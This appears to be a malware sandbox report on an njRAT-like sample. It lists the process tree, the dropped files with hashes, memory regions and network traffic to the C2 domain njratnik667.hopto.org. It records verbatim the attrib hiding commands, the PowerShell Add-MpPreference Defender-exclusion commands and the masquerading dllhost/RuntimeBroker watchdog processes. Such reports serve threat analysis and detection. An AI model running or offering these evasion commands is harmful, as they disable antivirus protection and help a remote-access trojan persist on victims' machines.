"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4572,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4532,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4352,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5004,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4664,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4844,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4564 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4784,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5184,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5316,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5324 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5172,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3240,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\1.exe
"C:\Users\Admin\Downloads\1.exe"
C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE
"C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE"
C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
"C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9536.tmp\9537.tmp\9538.bat C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe.config
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe.config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionExtension .exe
C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe" --install
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\System32\Microsoft\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Users\C:\Users\Admin\AppData\Roaming
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\dllhost.exe
"C:\Windows\dllhost.exe"
C:\Windows\dllhost.exe
C:\Windows\dllhost.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe" /launchSelfAndExit "C:\Windows\dllhost.exe" 812 /protectFile
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe" /watchProcess "C:\Windows\dllhost.exe" 812 "/protectFile"
C:\Users\Admin\Downloads\1.exe
"C:\Users\Admin\Downloads\1.exe"
C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE
"C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE"
C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
"C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E0B.tmp\2E0C.tmp\2E0D.bat C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe.config
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe.config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionExtension .exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\System32\Microsoft\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Users\C:\Users\Admin\AppData\Roaming
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5444,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3500 /prefetch:8
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
C:\Windows\System32\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | njratnik667.hopto.org | udp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| US | 8.8.8.8:53 | 242.160.123.93.in-addr.arpa | udp |
| GB | 142.250.187.227:80 | www.gstatic.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:80 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:80 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:10134 | njratnik667.hopto.org | tcp |
| GB | 2.18.66.42:443 | | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 52.182.143.210:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| DE | 216.58.206.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 95.100.153.143:443 | www.bing.com | tcp |
| GB | 2.16.153.60:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 939de3ac9196eddbf6cd24fbe419b141 |
| SHA1 | 8527dbc1cf34e3528a650dd21299509e78a68071 |
| SHA256 | d7b550dee3ff0be5126772a8058b6bfc6914a0caae1fa8e46abcdc3a0a2805e9 |
| SHA512 | 4b313754c6574cab1ce93540b8d625166c5c188a64e3dc13c2acb3ce66e5d0674163c20fe69b9adf9270a0e8aef90b3b1766ff7b9e8bdce4cfe028ea66c9f1e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 89ce38a1c90d9cee9d2418ecd9f50b29 |
| SHA1 | dfd73b02781ad0134ac6dc5c0b286c0c958e8a51 |
| SHA256 | 0952f8ac033da68d35027d023a7ddbc862ba43cd2212eed0e13cb904cb232eab |
| SHA512 | de9e1de35b8038c258db87e375ac250fe1dd22bcff179a988a9a426420643ae2faa2f2859bd2d88d5b8f97e523467aeae4d415ee889581eb81e8d1eb1ec8c598 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | dc9be0c24e872a8b7684f5962e040b25 |
| SHA1 | 20513e2c751eb88c7819c70278cbcc00dd1fd876 |
| SHA256 | 94c2b31a39b7c8002e8b577aced7fdebbe753f45777187065e1b5e2e0d434b13 |
| SHA512 | baec6da6bf80f7f63560143432bf0548e44fe6845e59da0bc41d957b6bf0034b773eb0380b769984b93ab25a7045a9be690ad46df8b20501ac7731084696d2e1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 11b0232f9acedb9b3b6d5208244df78a |
| SHA1 | 2639c0a18c048352d46708635227eeb36b6a81fb |
| SHA256 | 67c76300530272124399384f7d98287d90e661c45aa4b72e77a48fb94252cced |
| SHA512 | 240fdfc35a5cb695a9b0d4077326f58aa5c46d11191ff4b25fa13ab77fb315ea467f5baea9bf334a9872239bc799204b93dd46f8972692deaf857568b754cca3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
| MD5 | d474ec7f8d58a66420b6daa0893a4874 |
| SHA1 | 4314642571493ba983748556d0e76ec6704da211 |
| SHA256 | 553a19b6f44f125d9594c02231e4217e9d74d92b7065dc996d92f1e53f6bcb69 |
| SHA512 | 344062d1be40db095abb7392b047b16f33ea3043158690cf66a2fa554aa2db79c4aa68de1308f1eddf6b9140b9ac5de70aad960b4e8e8b91f105213c4aace348 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\429983a4-0095-46a4-ba48-e0aceb7e852b.tmp
| MD5 | 55a2b9b8adb7c34804a2f551f11239fc |
| SHA1 | e73494b639ec6fab757238328e4a0ab66442dd61 |
| SHA256 | 1026dac48dd194d26916f34f44c6e7e494e0bfd0a0e513f3d5a2348cbf98cac4 |
| SHA512 | 1addd3dc31b26b7481e919a99f914ea55ebfce1a579b8ad083e79abf413dbab4adba75760797c880d7259a02881618a15c30c33e71b458ed966e5b3d0aa5a799 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 187e1668726ce5a90aab8159d328d5fb |
| SHA1 | bff86c358419f006e128acd6a4b5aff8ff8fc1be |
| SHA256 | 5b6601f5276ea0d00d401ab2f214e0ad4517b101dd69820841497ea8bf2b1e8c |
| SHA512 | 70ab9088209d0d9f8354478f6767506d3bd632143c66ca92f52d749835c9d0dc42ffe8349338cb0d35f538f061986a2948cbc7344a568fd8eb62016abaef1161 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | db2b9bf5c9c8e8143f82084d01b04349 |
| SHA1 | 7662673d7816512548c83210a2943ddc026d9dd1 |
| SHA256 | 3c56c3cb1d9c21f39bd81e2e0b6481db56c275e72efeaa79444b6415c1a9d266 |
| SHA512 | c196779d57c75a9244cf83cadebf7872358a8cf1ef09a0467726915a033d9057ac5390fc30f1c55458f194ab89a491df5d36c054b533aa1b53af864e7fefeedb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | c01449ced81b1645296d2fd48ff81064 |
| SHA1 | cde58aa0dab73988d63d7fadd56073070d1e9dcf |
| SHA256 | e3dfef0d466225fd8d33d5020b77ca08863542461209c3063fed53176627835e |
| SHA512 | 0b7b05c718c318d6a89da4dabad9eb1ff133d0450228612faddd35f24993f46c98fa0d46f8fc3d1e68d389fef439e7ca22d3463bc4f7eaa6331cea1bb3361f85 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2344c68c3541e2f630936e84d0dcfa33 |
| SHA1 | aac39f7045fb061cc3c0e042df479ce8ac4a7375 |
| SHA256 | a7b3150c8fb70cc67d6088041bd084bfa72df2ab2119a3a1a653a88345aa9fc8 |
| SHA512 | 0d160edca3a20d735f235c5f06aa5dcc5ec3355103c30949c9017530a49c1d3050c870a2d06338c6b2cbd0df7170a29751f04b55405b49899285029b13927978 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | be6d4aa78f4ea77952121f05a23b35d0 |
| SHA1 | 7641ce4fcfd3fea589f6c321e49d123a47ed9740 |
| SHA256 | a2b0bfd2790690dd18ebc85442a02a3649fe1b9bd969a23ca2dcece477556a9d |
| SHA512 | abb52adbbb67e243ccb7c56406c38c5cc4dd6207ac1c22e7e49400e7bcb0b3f550a179afef7afa389bc3b8498b97c661665e916015a8dd7a64fec91bcd199eed |
C:\Users\Admin\Downloads\1.exe.crdownload
| MD5 | 6bd9fa3ef192a80e0fec426bedc752ec |
| SHA1 | 4decaa11b295b19927dec63f04102fca745e33f5 |
| SHA256 | 814336ac249fe8bd2b5700b3603c4f4ec095433d92e96ccf1d4ecd6968ad31f7 |
| SHA512 | da1bf9028fe8d369b0909e1395c62664cc4680e442e44cc739db0f8559b4ae3dc205fb5e948ecc3b6c10efd5c8fa57eefa648ec67ad131a6a486f4c9acf35937 |
C:\Users\Admin\Downloads\1.exe:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE
| MD5 | fa60d5addf070e384e17e8947b93736f |
| SHA1 | 47231f098d39f0aa6af3d00367db661936a905a9 |
| SHA256 | 867ff47b1dfb1aceddc866b285de98b9b6174e22c83d772dd48502ad333fc4e6 |
| SHA512 | 88ba67b3d70f061b0fe14c89a6c8562450d3265a54981057c61bd325cd8aef595a66a2949f67a1f46d3f94a6a065eaaf81d3f4f0d543e5f871e96c7941f6166d |
C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
| MD5 | 47a0e0b1f184a09c20aabdb3b7fd7d41 |
| SHA1 | cdf678618d5f6c3b24a994083280cbd7b9719d53 |
| SHA256 | 25ae495666d098744d9c5e0a0713358d9c4016052954679379f070aa253338ea |
| SHA512 | 405f43a56043f4301bbd9a196df9176008ac0ff84407401f5f7638542d90ad74d4be8ad6910333e79d47c6c9dd325ed1bf87c5c4dbd51ef33604539fc8ec1a56 |
memory/4112-165-0x0000000000850000-0x0000000000CA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9536.tmp\9537.tmp\9538.bat
| MD5 | 38aa62eab695ee35b45640b38d81c6fb |
| SHA1 | dad805dd77f333f65f7b27164be6d84ae7f0f2a6 |
| SHA256 | a099bad93b0e8c3e2686c8877a12b14cec058144332a92562fb1f514afc2c588 |
| SHA512 | 628a74cd801a13a851dfef0866a604c1c57d764a12f852557efbb15f2d23de762b3cea9e8e0ff2c03bceda2aafc9a87c1f2f416ff286b49adb0f2493f5248ddf |
memory/4112-167-0x0000000000850000-0x0000000000CA4000-memory.dmp
memory/4112-168-0x0000000005B40000-0x0000000005B4E000-memory.dmp
memory/4112-169-0x0000000005BA0000-0x0000000005BFC000-memory.dmp
memory/8-175-0x000001F3BDB90000-0x000001F3BDBB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnvu1rca.wqi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4112-179-0x00000000061B0000-0x0000000006756000-memory.dmp
memory/4112-180-0x0000000005CF0000-0x0000000005D82000-memory.dmp
memory/4112-182-0x00000000060F0000-0x00000000060F8000-memory.dmp
memory/4112-183-0x0000000006100000-0x000000000610A000-memory.dmp
memory/4112-184-0x0000000006150000-0x0000000006172000-memory.dmp
memory/4112-181-0x00000000060E0000-0x00000000060F2000-memory.dmp
C:\Windows\SysWOW64\WindowsInput.exe
| MD5 | e6fcf516d8ed8d0d4427f86e08d0d435 |
| SHA1 | c7691731583ab7890086635cb7f3e4c22ca5e409 |
| SHA256 | 8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337 |
| SHA512 | c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e |
C:\Windows\SysWOW64\WindowsInput.exe.config
| MD5 | a2b76cea3a59fa9af5ea21ff68139c98 |
| SHA1 | 35d76475e6a54c168f536e30206578babff58274 |
| SHA256 | f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839 |
| SHA512 | b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad |
memory/1452-201-0x0000000000E70000-0x0000000000E7C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
memory/1452-210-0x00000000016D0000-0x00000000016E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e8eb51096d6f6781456fef7df731d97 |
| SHA1 | ec2aaf851a618fb43c3d040a13a71997c25bda43 |
| SHA256 | 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864 |
| SHA512 | 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2 |
memory/1452-211-0x000000001BB20000-0x000000001BB5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 050567a067ffea4eb40fe2eefebdc1ee |
| SHA1 | 6e1fb2c7a7976e0724c532449e97722787a00fec |
| SHA256 | 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e |
| SHA512 | 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259 |
memory/1416-227-0x000000001A4B0000-0x000000001A5BA000-memory.dmp
memory/848-237-0x0000000005010000-0x0000000005046000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 781da0576417bf414dc558e5a315e2be |
| SHA1 | 215451c1e370be595f1c389f587efeaa93108b4c |
| SHA256 | 41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe |
| SHA512 | 24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737 |
memory/848-242-0x0000000005700000-0x0000000005D2A000-memory.dmp
memory/848-244-0x0000000005D30000-0x0000000005D96000-memory.dmp
memory/848-245-0x0000000005DA0000-0x0000000005E06000-memory.dmp
memory/848-243-0x0000000005600000-0x0000000005622000-memory.dmp
memory/848-254-0x0000000005F90000-0x00000000062E7000-memory.dmp
memory/848-256-0x00000000064B0000-0x00000000064CE000-memory.dmp
memory/848-257-0x0000000006550000-0x000000000659C000-memory.dmp
memory/848-287-0x0000000006AA0000-0x0000000006AD4000-memory.dmp
memory/848-288-0x000000006FFE0000-0x000000007002C000-memory.dmp
memory/848-298-0x0000000006AE0000-0x0000000006AFE000-memory.dmp
memory/848-299-0x00000000076E0000-0x0000000007784000-memory.dmp
memory/848-300-0x0000000007E40000-0x00000000084BA000-memory.dmp
memory/848-301-0x00000000077F0000-0x000000000780A000-memory.dmp
memory/848-302-0x0000000007870000-0x000000000787A000-memory.dmp
memory/848-303-0x0000000007A80000-0x0000000007B16000-memory.dmp
memory/848-304-0x0000000007A00000-0x0000000007A11000-memory.dmp
memory/848-305-0x0000000007A30000-0x0000000007A3E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 78b127dacb5c44f77f5235098fb8d4e3 |
| SHA1 | 741af58e15ea5197c2b82ee8865531171c69e336 |
| SHA256 | 1805f8040dcc8d2d9d1603f670319627d2ecb07c99201851d2a1f7969b7b042b |
| SHA512 | 6d690bc5eecbd5af8ec5751654f627a4a19036d7a21e6739bae80d86bfc86db99487a4da021ab63752fea22ef9d8b1425180badecac0cd90fea49b9669e9d036 |
memory/848-315-0x0000000007A40000-0x0000000007A55000-memory.dmp
memory/848-316-0x0000000007B40000-0x0000000007B5A000-memory.dmp
memory/848-317-0x0000000007B30000-0x0000000007B38000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 1e7dd00b69af4d51fb747a9f42c6cffa |
| SHA1 | 496cdb3187d75b73c0cd72c69cd8d42d3b97bca2 |
| SHA256 | bc7aec43a9afb0d07ef7e3b84b5d23a907b6baff367ecd4235a15432748f1771 |
| SHA512 | d5227d3df5513d7d0d7fb196eef014e54094c5ed8c5d31207b319e12480433f1424d49df759a7a2aefc6a69cef6bf2a0cc45d05660e618dc2ec9a2b082b7b5f7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 165d4f43209bffcd62e60929ee8b194f |
| SHA1 | e4786f8ed1ccefe22b07ed081aa0af44bfd59c90 |
| SHA256 | efabbdc19ad90ca4968d5b8a5ca8685ba3d2d8f3630df7201d1b5490eab4381b |
| SHA512 | d7c5e32c58e808ebe767b3a718e1af54413d94a235c15f374746dde59a6858e4c36b114d7b32c4fd82037130e204e7fbbd6d4adbd6ba373940cef04c4e17a2ec |
memory/812-339-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/4112-341-0x0000000000850000-0x0000000000CA4000-memory.dmp
memory/812-343-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-344-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-345-0x0000000006850000-0x000000000689E000-memory.dmp
memory/812-346-0x0000000006E90000-0x0000000006EA8000-memory.dmp
memory/812-347-0x0000000007070000-0x0000000007088000-memory.dmp
memory/1264-350-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-349-0x0000000007420000-0x00000000075E2000-memory.dmp
memory/812-351-0x0000000007250000-0x0000000007260000-memory.dmp
